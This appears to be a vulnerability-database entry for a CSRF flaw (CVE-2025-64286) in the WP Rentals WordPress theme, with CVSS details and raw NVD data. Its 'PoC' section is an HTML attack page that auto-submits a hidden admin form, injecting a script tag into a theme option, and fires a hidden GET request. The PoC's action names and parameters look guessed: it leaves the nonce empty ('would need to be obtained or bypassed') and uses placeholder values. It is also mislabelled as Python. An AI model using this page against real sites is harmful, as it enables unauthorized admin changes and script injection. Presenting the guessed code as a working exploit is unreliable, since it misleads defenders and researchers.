Security Vulnerability Report
中文
CVE-2025-64286 CVSS 4.3 MEDIUM

CVE-2025-64286

Published: 2025-10-29 09:15:46
Last Modified: 2026-04-27 16:16:40

Description

Cross-Site Request Forgery (CSRF) vulnerability in WpEstate WP Rentals wprentals allows Cross Site Request Forgery.This issue affects WP Rentals: from n/a through <= 3.13.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Rentals <= 3.13.1 (所有受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-64286 - WP Rentals CSRF Vulnerability --> <!-- This PoC demonstrates how an attacker could exploit the CSRF vulnerability --> <!DOCTYPE html> <html> <head> <title>WP Rentals CSRF Attack PoC</title> </head> <body> <h1>CVE-2025-64286 CSRF PoC</h1> <p>This is a demonstration of the CSRF vulnerability in WP Rentals theme.</p> <!-- Example: Malicious form targeting WP Rentals admin action --> <form id="csrfForm" action="http://target-site/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Common WP Rentals nonce bypass attempt --> <input type="hidden" name="action" value="wprentals_update_option"> <input type="hidden" name="option_page" value="wprentals_theme_option_group"> <!-- Example malicious parameter injection --> <input type="hidden" name="wprentals_theme_options[custom_code]" value="<script>alert('XSS')</script>"> <!-- CSRF token (would need to be obtained or bypassed) --> <input type="hidden" name="_wpnonce" value=""> <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wprentals_theme_options"> </form> <script> // Auto-submit form on page load document.getElementById('csrfForm').submit(); console.log('CSRF PoC executed'); </script> <!-- Alternative: Image-based GET request trigger --> <img src="http://target-site/wp-admin/admin.php?action=wprentals_action&param=value" style="display:none" onerror="console.log('CSRF attempt completed')"> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64286", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:46.097", "lastModified": "2026-04-27T16:16:39.917", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in WpEstate WP Rentals wprentals allows Cross Site Request Forgery.This issue affects WP Rentals: from n/a through <= 3.13.1."}, {"lang": "es", "value": "Vulnerabilidad de Cross-Site Request Forgery (CSRF) en WpEstate WP Rentals wprentals permite la Cross-Site Request Forgery. Este problema afecta a WP Rentals: desde n/a hasta menor igual que 3.13.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wprentals/vulnerability/wordpress-wp-rentals-theme-3-13-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}